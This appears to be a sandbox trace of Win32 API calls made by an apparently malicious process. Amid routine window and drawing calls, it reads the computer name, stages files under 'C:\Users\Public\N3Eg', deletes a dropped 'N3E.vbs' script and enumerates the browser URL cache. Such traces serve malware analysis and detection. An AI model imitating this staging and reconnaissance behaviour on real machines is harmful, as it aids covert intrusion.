FlatSB_SetScrollInfo (param_1=0x10134, code=1, psi=0x534ee2c, fRedraw=1) returned 0 [0281.738] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.738] IsIconic (hWnd=0x10134) returned 0 [0281.738] GetClientRect (in: hWnd=0x10134, lpRect=0x534edf0 | out: lpRect=0x534edf0) returned 1 [0281.738] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.738] IsIconic (hWnd=0x10134) returned 0 [0281.738] GetClientRect (in: hWnd=0x10134, lpRect=0x534edf0 | out: lpRect=0x534edf0) returned 1 [0281.738] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.738] IsIconic (hWnd=0x10134) returned 0 [0281.739] GetClientRect (in: hWnd=0x10134, lpRect=0x534edf0 | out: lpRect=0x534edf0) returned 1 [0281.739] FlatSB_SetScrollProp (param_1=0x10134, index=0x200, newValue=0x0, param_4=0) returned 0 [0281.739] GetSysColor (nIndex=20) returned 0xffffff [0281.739] FlatSB_SetScrollProp (param_1=0x10134, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0281.739] FlatSB_SetScrollInfo (param_1=0x10134, code=0, psi=0x534ee2c, fRedraw=1) returned 0 [0281.739] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.739] IsIconic (hWnd=0x10134) returned 0 [0281.739] GetClientRect (in: hWnd=0x10134, lpRect=0x534edf0 | out: lpRect=0x534edf0) returned 1 [0281.739] GetCurrentThreadId () returned 0x62c [0281.739] GetCurrentThreadId () returned 0x62c [0281.739] GetCurrentThreadId () returned 0x62c [0281.739] GetCurrentThreadId () returned 0x62c [0281.739] GetCurrentThreadId () returned 0x62c [0281.739] GetCurrentThreadId () returned 0x62c [0281.740] GetCurrentThreadId () returned 0x62c [0281.740] GetCurrentThreadId () returned 0x62c [0281.740] GetCurrentThreadId () returned 0x62c [0281.740] GetCurrentThreadId () returned 0x62c [0281.740] GetCurrentThreadId () returned 0x62c [0281.740] GetCurrentThreadId () returned 0x62c [0281.740] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x83, wParam=0x1, lParam=0x534f2f0) returned 0x0 [0281.740] GetCurrentThreadId () returned 0x62c [0281.740] GetCurrentThreadId () returned 0x62c [0281.740] GetCurrentThreadId () returned 0x62c [0281.740] GetCurrentThreadId () returned 0x62c [0281.741] GetCurrentThreadId () returned 0x62c [0281.741] GetCurrentThreadId () returned 0x62c [0281.741] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x534f71c, fWinIni=0x0 | out: pvParam=0x534f71c) returned 1 [0281.741] IsIconic (hWnd=0x10134) returned 0 [0281.741] GetClientRect (in: hWnd=0x10134, lpRect=0x534f7b4 | out: lpRect=0x534f7b4) returned 1 [0281.741] GetCurrentThreadId () returned 0x62c [0281.741] GetCurrentThreadId () returned 0x62c [0281.741] GetCurrentThreadId () returned 0x62c [0281.741] GetCurrentThreadId () returned 0x62c [0281.741] GetCurrentThreadId () returned 0x62c [0281.741] GetCurrentThreadId () returned 0x62c [0281.741] GetCurrentThreadId () returned 0x62c [0281.741] GetCurrentThreadId () returned 0x62c [0281.741] GetCurrentThreadId () returned 0x62c [0281.741] GetCurrentThreadId () returned 0x62c [0281.741] FreeResource (hResData=0x625a9ec) returned 0 [0281.741] GetDC (hWnd=0x0) returned 0xc01016e [0281.742] MoveToEx (in: hdc=0xc01016e, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0281.742] SelectObject (hdc=0xc01016e, h=0xb0a0227) returned 0x18a002e [0281.742] GetSysColor (nIndex=8) returned 0x0 [0281.742] SetTextColor (hdc=0xc01016e, color=0x0) returned 0x0 [0281.742] SelectObject (hdc=0xc01016e, h=0x830021e) returned 0x1b00017 [0281.742] SetROP2 (hdc=0xc01016e, rop2=13) returned 13 [0281.742] UnrealizeObject (h=0xc100741) returned 1 [0281.742] SelectObject (hdc=0xc01016e, h=0xc100741) returned 0x1900010 [0281.742] SetBkColor (hdc=0xc01016e, color=0xffffff) returned 0xffffff [0281.742] SetBkMode (hdc=0xc01016e, mode=2) returned 2 [0281.742] GetSysColor (nIndex=8) returned 0x0 [0281.742] GetSysColor (nIndex=14) returned 0xffffff [0281.742] DrawThemeTextEx () returned 0x0 [0281.747] SelectObject (hdc=0xc01016e, h=0x1b00017) returned 0x830021e [0281.747] SelectObject (hdc=0xc01016e, h=0x1900015) returned 0xc100741 [0281.747] SelectObject (hdc=0xc01016e, h=0x18a002e) returned 0xb0a0227 [0281.747] GetCurrentPositionEx (in: hdc=0xc01016e, lppt=0x534f870 | out: lppt=0x534f870) returned 1 [0281.747] ReleaseDC (hWnd=0x0, hDC=0xc01016e) returned 1 [0281.747] GetDC (hWnd=0x0) returned 0xc01016e [0281.747] MoveToEx (in: hdc=0xc01016e, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0281.747] SelectObject (hdc=0xc01016e, h=0xb0a0227) returned 0x18a002e [0281.747] GetSysColor (nIndex=8) returned 0x0 [0281.747] SetTextColor (hdc=0xc01016e, color=0x0) returned 0x0 [0281.747] SelectObject (hdc=0xc01016e, h=0x830021e) returned 0x1b00017 [0281.747] SetROP2 (hdc=0xc01016e, rop2=13) returned 13 [0281.747] UnrealizeObject (h=0xc100741) returned 1 [0281.747] SelectObject (hdc=0xc01016e, h=0xc100741) returned 0x1900010 [0281.747] SetBkColor (hdc=0xc01016e, color=0xffffff) returned 0xffffff [0281.748] SetBkMode (hdc=0xc01016e, mode=2) returned 2 [0281.748] GetSysColor (nIndex=8) returned 0x0 [0281.748] GetSysColor (nIndex=14) returned 0xffffff [0281.748] DrawThemeTextEx () returned 0x0 [0281.748] SelectObject (hdc=0xc01016e, h=0x1b00017) returned 0x830021e [0281.748] SelectObject (hdc=0xc01016e, h=0x1900015) returned 0xc100741 [0281.748] SelectObject (hdc=0xc01016e, h=0x18a002e) returned 0xb0a0227 [0281.748] GetCurrentPositionEx (in: hdc=0xc01016e, lppt=0x534f870 | out: lppt=0x534f870) returned 1 [0281.748] ReleaseDC (hWnd=0x0, hDC=0xc01016e) returned 1 [0281.748] GetDC (hWnd=0x0) returned 0xc01016e [0281.748] MoveToEx (in: hdc=0xc01016e, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0281.748] SelectObject (hdc=0xc01016e, h=0xb0a0227) returned 0x18a002e [0281.748] GetSysColor (nIndex=8) returned 0x0 [0281.748] SetTextColor (hdc=0xc01016e, color=0x0) returned 0x0 [0281.748] SelectObject (hdc=0xc01016e, h=0x830021e) returned 0x1b00017 [0281.748] SetROP2 (hdc=0xc01016e, rop2=13) returned 13 [0281.748] UnrealizeObject (h=0xc100741) returned 1 [0281.748] SelectObject (hdc=0xc01016e, h=0xc100741) returned 0x1900010 [0281.748] SetBkColor (hdc=0xc01016e, color=0xffffff) returned 0xffffff [0281.748] SetBkMode (hdc=0xc01016e, mode=2) returned 2 [0281.748] GetSysColor (nIndex=8) returned 0x0 [0281.748] GetSysColor (nIndex=14) returned 0xffffff [0281.748] DrawThemeTextEx () returned 0x0 [0281.748] SelectObject (hdc=0xc01016e, h=0x1b00017) returned 0x830021e [0281.749] SelectObject (hdc=0xc01016e, h=0x1900015) returned 0xc100741 [0281.749] SelectObject (hdc=0xc01016e, h=0x18a002e) returned 0xb0a0227 [0281.749] GetCurrentPositionEx (in: hdc=0xc01016e, lppt=0x534f870 | out: lppt=0x534f870) returned 1 [0281.749] ReleaseDC (hWnd=0x0, hDC=0xc01016e) returned 1 [0281.749] GetCurrentThreadId () returned 0x62c [0281.749] GetCurrentThreadId () returned 0x62c [0281.749] GetCurrentThreadId () returned 0x62c [0281.749] GetCurrentThreadId () returned 0x62c [0281.749] GetCurrentThreadId () returned 0x62c [0281.749] GetCurrentThreadId () returned 0x62c [0281.749] GetCurrentThreadId () returned 0x62c [0281.749] GetCurrentThreadId () returned 0x62c [0281.749] SetEvent (hEvent=0x828) returned 1 [0281.749] SetEvent (hEvent=0x824) returned 1 [0281.749] FindWindowW (lpClassName=0x0, lpWindowName="k8w0") returned 0x0 [0281.749] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0281.749] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xd, wParam=0xa, lParam=0x635fd6c) returned 0x9 [0281.749] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xc, wParam=0x0, lParam=0x61efed0) returned 0x1 [0281.749] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xb012, wParam=0x0, lParam=0x0) returned 0x0 [0281.749] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0281.750] GetComputerNameW (in: lpBuffer=0x635fd64, nSize=0x534f6ac | out: lpBuffer="N3EERVTWSM", nSize=0x534f6ac) returned 1 [0281.750] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\uc") returned 0x20 [0281.751] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0281.751] GetComputerNameW (in: lpBuffer=0x635fd14, nSize=0x534f6ac | out: lpBuffer="N3EERVTWSM", nSize=0x534f6ac) returned 1 [0281.751] GetComputerNameW (in: lpBuffer=0x635fd64, nSize=0x534f6e8 | out: lpBuffer="N3EERVTWSM", nSize=0x534f6e8) returned 1 [0281.751] DeleteFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3E.vbs" (normalized: "c:\\users\\public\\n3eg\\n3e.vbs")) returned 1 [0281.752] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\ybb") returned 0xffffffff [0281.752] GetLastError () returned 0x2 [0281.752] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\yne") returned 0xffffffff [0281.752] GetLastError () returned 0x2 [0281.752] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\yit") returned 0xffffffff [0281.752] GetLastError () returned 0x2 [0281.752] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\yst") returned 0xffffffff [0281.752] GetLastError () returned 0x2 [0281.752] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\ycx") returned 0xffffffff [0281.752] GetLastError () returned 0x2 [0281.752] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\git") returned 0xffffffff [0281.752] GetLastError () returned 0x2 [0281.753] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\gbb") returned 0xffffffff [0281.753] GetLastError () returned 0x2 [0281.753] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\gst") returned 0xffffffff [0281.753] GetLastError () returned 0x2 [0281.753] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\gcx") returned 0xffffffff [0281.753] GetLastError () returned 0x2 [0281.753] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\gne") returned 0xffffffff [0281.753] GetLastError () returned 0x2 [0281.754] FindFirstUrlCacheEntryW (in: lpszUrlSearchPattern=0x0, lpFirstCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x534f6f4 | out: lpFirstCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x534f6f4) returned 0x0 [0281.794] FindFirstUrlCacheEntryW (in: lpszUrlSearchPattern=0x0, lpFirstCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x534f6f4 | out: lpFirstCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x534f6f4) returned 0x0 [0281.795] FindCloseUrlCache (hEnumHandle=0x0) returned 0 [0281.795] GetComputerNameW (in: lpBuffer=0x635fd64, nSize=0x534f6f4 | out: lpBuffer="N3EERVTWSM", nSize=0x534f6f4) returned 1 [0281.795] DeleteFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3E.vbs" (normalized: "c:\\users\\public\\n3eg\\n3e.vbs")) returned 0 [0281.795] GetLastError () returned 0x2 [0281.795] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\N3E.vbs") returned 0xffffffff [0281.795] SetLastError (dwErrCode=0x2) [0281.796] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0281.796] GetComputerNameW (in: lpBuffer=0x635fd64, nSize=0x534f694 | out: lpBuffer="N3EERVTWSM", nSize=0x534f694) returned 1 [0281.796] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\wVs" (normalized: "c:\\users\\public\\n3eg\\wvs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8b0 [0281.797] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="50\r\n", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0281.797] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="50\r\n", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0281.797] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="50\r\n", cchWideChar=4, lpMultiByteStr=0x6358318, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="50\r\n\x10\x805\x06Dý\x0f\x06", lpUsedDefaultChar=0x0) returned 4 [0281.797] WriteFile (in: hFile=0x8b0, lpBuffer=0x6358318*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x534f64c, lpOverlapped=0x0 | out: lpBuffer=0x6358318*, lpNumberOfBytesWritten=0x534f64c, lpOverlapped=0x0) returned 1 [0281.799] CloseHandle (hObject=0x8b0) returned 1 [0281.800] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\idx") returned 0x20 [0281.801] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\wCnx") returned 0xffffffff [0281.801] GetLastError () returned 0x2 [0281.802] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\logx\\tx0") returned 0xffffffff [0281.802] GetLastError () returned 0x3 [0281.802] GetFileAttributesW (lpFileName="C:\\Users\\Public\\N3Eg\\logx\\mb0") returned 0xffffffff [0281.802] GetLastError () returned 0x3 [0281.802] GetWindowLongW (hWnd=0x10110, nIndex=-20) returned 256 [0281.802] IsIconic (hWnd=0x10110) returned 0 [0281.802] IsWindowVisible (hWnd=0x10110) returned 0 [0281.802] SetWindowLongW (hWnd=0x10110, nIndex=-20, dwNewLong=262400) returned 256 [0281.802] DefWindowProcW (hWnd=0x10110, Msg=0x7c, wParam=0xffffffec, lParam=0x534f8f8) returned 0x0 [0281.802] DefWindowProcW (hWnd=0x10110, Msg=0x7d, wParam=0xffffffec, lParam=0x534f8f8) returned 0x0 [0281.803] MonitorFromWindow (hwnd=0x10134, dwFlags=0x2) returned 0x10001 [0281.803] IsWindowVisible (hWnd=0x10110) returned 0 [0281.803] SetWindowPos (hWnd=0x10110, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x57) returned 1 [0281.803] DefWindowProcW (hWnd=0x10110, Msg=0x46, wParam=0x0, lParam=0x534f4d4) returned 0x0 [0281.806] DefWindowProcW (hWnd=0x10110, Msg=0x47, wParam=0x0, lParam=0x534f4d4) returned 0x0 [0281.807] ShowWindow (hWnd=0x10134, nCmdShow=1) returned 0 [0281.807] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0281.807] GetCurrentThreadId () returned 0x62c [0281.807] GetCurrentThreadId () returned 0x62c [0281.807] GetCurrentThreadId () returned 0x62c [0281.807] GetCurrentThreadId () returned 0x62c [0281.807] GetCurrentThreadId () returned 0x62c [0281.807] GetCurrentThreadId () returned 0x62c [0281.807] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x46, wParam=0x0, lParam=0x534f508) returned 0x0 [0281.807] GetCurrentThreadId () returned 0x62c [0281.807] GetCurrentThreadId () returned 0x62c [0281.807] GetCurrentThreadId () returned 0x62c [0281.807] GetCurrentThreadId () returned 0x62c [0281.807] GetCurrentThreadId () returned 0x62c [0281.807] GetCurrentThreadId () returned 0x62c [0281.807] DefWindowProcW (hWnd=0x10110, Msg=0x46, wParam=0x0, lParam=0x534f508) returned 0x0 [0281.808] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x46, wParam=0x0, lParam=0x534f508) returned 0x0 [0281.808] GetCurrentThreadId () returned 0x62c [0281.808] GetCurrentThreadId () returned 0x62c [0281.808] GetCurrentThreadId () returned 0x62c [0281.808] GetCurrentThreadId () returned 0x62c [0281.808] GetCurrentThreadId () returned 0x62c [0281.808] GetCurrentThreadId () returned 0x62c [0281.808] DefWindowProcW (hWnd=0x10110, Msg=0x46, wParam=0x0, lParam=0x534f508) returned 0x0 [0281.808] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.808] GetCurrentThreadId () returned 0x62c [0281.808] GetCurrentThreadId () returned 0x62c [0281.808] GetCurrentThreadId () returned 0x62c [0281.808] GetCurrentThreadId () returned 0x62c [0281.808] GetCurrentThreadId () returned 0x62c [0281.808] GetCurrentThreadId () returned 0x62c [0281.809] DefWindowProcW (hWnd=0x10110, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.809] PostMessageW (hWnd=0x10110, Msg=0xb000, wParam=0x0, lParam=0x0) returned 1 [0281.809] DefWindowProcW (hWnd=0x10132, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.809] DefWindowProcW (hWnd=0x10130, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.809] DefWindowProcW (hWnd=0x1012e, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.809] DefWindowProcW (hWnd=0x1012c, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.809] DefWindowProcW (hWnd=0x1012a, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.809] DefWindowProcW (hWnd=0x10128, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.809] DefWindowProcW (hWnd=0x10126, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.809] DefWindowProcW (hWnd=0x10124, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.809] DefWindowProcW (hWnd=0x10122, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.809] DefWindowProcW (hWnd=0x10120, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.809] DefWindowProcW (hWnd=0x1011e, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.809] DefWindowProcW (hWnd=0x1011c, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.810] DefWindowProcW (hWnd=0x1011a, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.810] DefWindowProcW (hWnd=0x10118, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.810] DefWindowProcW (hWnd=0x10116, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.810] DefWindowProcW (hWnd=0x10114, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.810] DefWindowProcW (hWnd=0x10112, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.810] DefWindowProcW (hWnd=0x1010c, Msg=0x1c, wParam=0x1, lParam=0x48c) returned 0x0 [0281.810] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0281.812] GetCurrentThreadId () returned 0x62c [0281.812] GetCurrentThreadId () returned 0x62c [0281.812] GetCurrentThreadId () returned 0x62c [0281.812] GetCurrentThreadId () returned 0x62c [0281.812] GetCurrentThreadId () returned 0x62c [0281.812] GetCurrentThreadId () returned 0x62c [0281.812] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.812] SetFocus (hWnd=0x10134) returned 0x0 [0281.814] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0281.815] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] SendMessageW (hWnd=0x10134, Msg=0xb000, wParam=0x0, lParam=0x0) returned 0x0 [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.815] GetCurrentThreadId () returned 0x62c [0281.816] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetFocus () returned 0x10134 [0281.816] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0xb029, wParam=0x0, lParam=0x0) returned 0x0 [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] IsIconic (hWnd=0x10134) returned 0 [0281.816] GetWindowRect (in: hWnd=0x10134, lpRect=0x534f174 | out: lpRect=0x534f174) returned 1 [0281.816] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.816] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x47, wParam=0x0, lParam=0x534f508) returned 0x0 [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.816] GetCurrentThreadId () returned 0x62c [0281.817] DefWindowProcW (hWnd=0x10110, Msg=0x47, wParam=0x0, lParam=0x534f508) returned 0x0 [0281.817] IsIconic (hWnd=0x10134) returned 0 [0281.817] GetWindowRect (in: hWnd=0x10134, lpRect=0x534f178 | out: lpRect=0x534f178) returned 1 [0281.817] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.817] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x5, wParam=0x0, lParam=0x1100b2) returned 0x0 [0281.817] IsIconic (hWnd=0x10134) returned 0 [0281.817] GetClientRect (in: hWnd=0x10134, lpRect=0x534f1a8 | out: lpRect=0x534f1a8) returned 1 [0281.817] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x534f1a8, fWinIni=0x0 | out: pvParam=0x534f1a8) returned 1 [0281.817] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.817] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.817] IsIconic (hWnd=0x10134) returned 0 [0281.817] GetClientRect (in: hWnd=0x10134, lpRect=0x534f18c | out: lpRect=0x534f18c) returned 1 [0281.817] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.817] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.818] IsIconic (hWnd=0x10134) returned 0 [0281.818] GetClientRect (in: hWnd=0x10134, lpRect=0x534f18c | out: lpRect=0x534f18c) returned 1 [0281.818] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.818] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.818] IsIconic (hWnd=0x10134) returned 0 [0281.818] GetClientRect (in: hWnd=0x10134, lpRect=0x534f15c | out: lpRect=0x534f15c) returned 1 [0281.818] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.818] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.818] IsIconic (hWnd=0x10134) returned 0 [0281.818] GetClientRect (in: hWnd=0x10134, lpRect=0x534f15c | out: lpRect=0x534f15c) returned 1 [0281.818] FlatSB_SetScrollProp (param_1=0x10134, index=0x100, newValue=0x0, param_4=0) returned 0 [0281.818] GetSysColor (nIndex=20) returned 0xffffff [0281.818] FlatSB_SetScrollProp (param_1=0x10134, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0281.818] FlatSB_SetScrollInfo (param_1=0x10134, code=1, psi=0x534f198, fRedraw=1) returned 0 [0281.819] FlatSB_GetScrollPos (param_1=0x10134, code=1) returned 0 [0281.819] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.819] IsIconic (hWnd=0x10134) returned 0 [0281.819] GetClientRect (in: hWnd=0x10134, lpRect=0x534f15c | out: lpRect=0x534f15c) returned 1 [0281.819] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.819] IsIconic (hWnd=0x10134) returned 0 [0281.819] GetClientRect (in: hWnd=0x10134, lpRect=0x534f15c | out: lpRect=0x534f15c) returned 1 [0281.819] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.819] IsIconic (hWnd=0x10134) returned 0 [0281.819] GetClientRect (in: hWnd=0x10134, lpRect=0x534f15c | out: lpRect=0x534f15c) returned 1 [0281.819] FlatSB_SetScrollProp (param_1=0x10134, index=0x200, newValue=0x0, param_4=0) returned 0 [0281.819] GetSysColor (nIndex=20) returned 0xffffff [0281.819] FlatSB_SetScrollProp (param_1=0x10134, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0281.819] FlatSB_SetScrollInfo (param_1=0x10134, code=0, psi=0x534f198, fRedraw=1) returned 0 [0281.820] FlatSB_GetScrollPos (param_1=0x10134, code=0) returned 0 [0281.820] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.820] IsIconic (hWnd=0x10134) returned 0 [0281.820] GetClientRect (in: hWnd=0x10134, lpRect=0x534f15c | out: lpRect=0x534f15c) returned 1 [0281.820] GetCurrentThreadId () returned 0x62c [0281.820] GetCurrentThreadId () returned 0x62c [0281.820] GetCurrentThreadId () returned 0x62c [0281.820] GetCurrentThreadId () returned 0x62c [0281.820] GetCurrentThreadId () returned 0x62c [0281.820] GetCurrentThreadId () returned 0x62c [0281.820] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x3, wParam=0x0, lParam=0xfe5afe44) returned 0x0 [0281.821] IsIconic (hWnd=0x10134) returned 0 [0281.821] GetWindowRect (in: hWnd=0x10134, lpRect=0x534f19c | out: lpRect=0x534f19c) returned 1 [0281.821] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 382664704 [0281.821] GetCurrentThreadId () returned 0x62c [0281.821] GetCurrentThreadId () returned 0x62c [0281.821] GetCurrentThreadId () returned 0x62c [0281.821] GetCurrentThreadId () returned 0x62c [0281.821] GetCurrentThreadId () returned 0x62c [0281.821] GetCurrentThreadId () returned 0x62c [0281.821] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x534f938, fWinIni=0x0 | out: pvParam=0x534f938) returned 1 [0281.821] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x534f944) returned 1 [0281.821] IsWindowUnicode (hWnd=0x10110) returned 1 [0281.821] PeekMessageW (in: lpMsg=0x534f944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x534f944) returned 1 [0281.821] GetCapture () returned 0x0 [0281.821] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x534f908 | out: lpdwProcessId=0x534f908) returned 0x62c [0281.821] GetCurrentProcessId () returned 0x470 [0281.821] GlobalFindAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.821] GetPropW (hWnd=0x10110, lpString=0xc02f) returned 0x0 [0281.821] GetParent (hWnd=0x10110) returned 0x0 [0281.821] TranslateMessage (lpMsg=0x534f944) returned 0 [0281.821] DispatchMessageW (lpMsg=0x534f944) returned 0x0 